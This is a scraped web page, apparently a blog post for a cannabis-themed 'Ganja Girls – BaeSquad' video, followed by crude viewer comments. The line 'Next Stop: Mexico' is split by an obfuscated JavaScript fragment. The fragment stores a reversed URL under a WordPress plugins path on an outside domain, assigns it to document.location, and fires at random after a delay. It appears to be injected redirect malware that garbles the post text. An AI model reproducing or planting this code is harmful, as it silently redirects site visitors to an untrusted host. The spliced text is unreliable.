Ganja Girls – BaeSquad, Bud & Benjamins and Ganja Girls did a nice little collaboration in Vegas with the entire BaeSquad. Happy Hump Day!!
Music: Born I Music – Numbers

Next Stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}top: Mexico and then Hawaii 🙂

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24 thoughts on “Ganja Girls – BaeSquad, Bud & Benjamins”

  1. Kejvi Kazo says:

    wow nice ganja it's beautiful

  2. Jtrain21 says:

    better than porn

  3. LoyLoy Geralde says:

    damn, who's the spanish girl wearing red top yellow bottom staring into the camera

  4. Edward Real says:

    y cant i chill with these girls

  5. Ewa Kudlek says:


  6. Jojo Marlene Alvaro says:

    you guys should kiss each other! ! ♡☆

  7. alberto gonzalez says:

    I just wish that some night I dream of this, that would be the best!

  8. aiandenk says:

    how much for a night?

  9. aiandenk says:

    there is porn of this?

  10. Jiri Dostal says:

    Dobry 🙂

  11. Vojta Mihál says:

    How to unlock this video?

  12. Probin Basumatary says:

    Yooo wow so cute

  13. Chad Willmore says:

    Ok uh Babes booze money or pot. Hmm I choose money because in debt.Babes booze and pot costs money. Besides you cant put babes in bank until you need them lol

  14. kingdavid solomon says:

    fucking hate alcohol'

  15. kaynatıyon yine hı says:


  16. Phantom Striker says:

    I wanna smash all of them 😉

  17. VSIM 79 says:

    Хули у нас в стране этот канал запрещен к просмотру? Если я читал Анну Каренину – это не означает что я люблю поезда.

  18. Oddity Anime says:

    the babes and editing are primo but GD this song is trash

  19. Winter Jaguar says:

    kame from mind state blunted

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